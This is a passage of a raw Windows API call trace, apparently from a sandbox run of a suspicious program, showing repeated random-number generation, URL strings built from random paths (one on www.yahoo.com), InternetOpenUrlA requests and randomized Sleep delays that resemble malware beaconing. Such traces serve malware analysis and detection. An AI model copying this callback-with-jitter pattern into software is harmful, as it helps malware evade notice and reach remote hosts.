out: pbBuffer=0x4d54c6) returned 0x0 [0178.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0178.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.629] GetProcessHeap () returned 0x440000 [0178.629] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0178.629] lstrcpyA (in: lpString1=0x4726f0, lpString2="`TM" | out: lpString1="`TM") returned="`TM" [0178.629] lstrcatA (in: lpString1="`TM", lpString2="/lqpq3chkeXx0v5ovrS1/shb5om8S9vuIby9soc98t5vbH2f3sm8fypq2stM7p84m3v/d9hU0kwq0Eqlx3r4eorrdnfgrkkHng4bd/tlj0v3m0pesbc4ggceqex5l0noT9VV7/" | out: lpString1="`TM/lqpq3chkeXx0v5ovrS1/shb5om8S9vuIby9soc98t5vbH2f3sm8fypq2stM7p84m3v/d9hU0kwq0Eqlx3r4eorrdnfgrkkHng4bd/tlj0v3m0pesbc4ggceqex5l0noT9VV7/") returned="`TM/lqpq3chkeXx0v5ovrS1/shb5om8S9vuIby9soc98t5vbH2f3sm8fypq2stM7p84m3v/d9hU0kwq0Eqlx3r4eorrdnfgrkkHng4bd/tlj0v3m0pesbc4ggceqex5l0noT9VV7/" [0178.629] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0178.629] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="`TM/lqpq3chkeXx0v5ovrS1/shb5om8S9vuIby9soc98t5vbH2f3sm8fypq2stM7p84m3v/d9hU0kwq0Eqlx3r4eorrdnfgrkkHng4bd/tlj0v3m0pesbc4ggceqex5l0noT9VV7/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0178.629] GetProcessHeap () returned 0x440000 [0178.629] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0178.629] GetProcessHeap () returned 0x440000 [0178.629] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5460 | out: hHeap=0x440000) returned 1 [0178.629] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0178.630] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0178.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0178.630] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0178.630] Sleep (dwMilliseconds=0x16d23) [0178.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0178.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.797] GetProcessHeap () returned 0x440000 [0178.797] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4e30 [0178.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4e31, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4f4e31) returned 0x0 [0178.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.799] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0178.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.802] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.804] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.804] GetProcessHeap () returned 0x440000 [0178.804] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0178.804] lstrcpyA (in: lpString1=0x4726f0, lpString2="°\x04©ps://www.yahoo.com" | out: lpString1="°\x04©ps://www.yahoo.com") returned="°\x04©ps://www.yahoo.com" [0178.804] lstrcatA (in: lpString1="°\x04©ps://www.yahoo.com", lpString2="/a85yd5nkUxachveey8o3s8ehyexkN2BmKaszM/" | out: lpString1="°\x04©ps://www.yahoo.com/a85yd5nkUxachveey8o3s8ehyexkN2BmKaszM/") returned="°\x04©ps://www.yahoo.com/a85yd5nkUxachveey8o3s8ehyexkN2BmKaszM/" [0178.804] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0178.804] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="°\x04©ps://www.yahoo.com/a85yd5nkUxachveey8o3s8ehyexkN2BmKaszM/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0178.805] GetProcessHeap () returned 0x440000 [0178.805] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0178.805] GetProcessHeap () returned 0x440000 [0178.805] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f4e30 | out: hHeap=0x440000) returned 1 [0178.805] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0178.805] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0178.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0178.806] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0178.806] Sleep (dwMilliseconds=0x148ab) [0178.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0178.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.999] GetProcessHeap () returned 0x440000 [0178.999] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16f80 [0178.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0179.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f81, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a16f81) returned 0x0 [0179.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0179.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0179.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0179.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0179.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 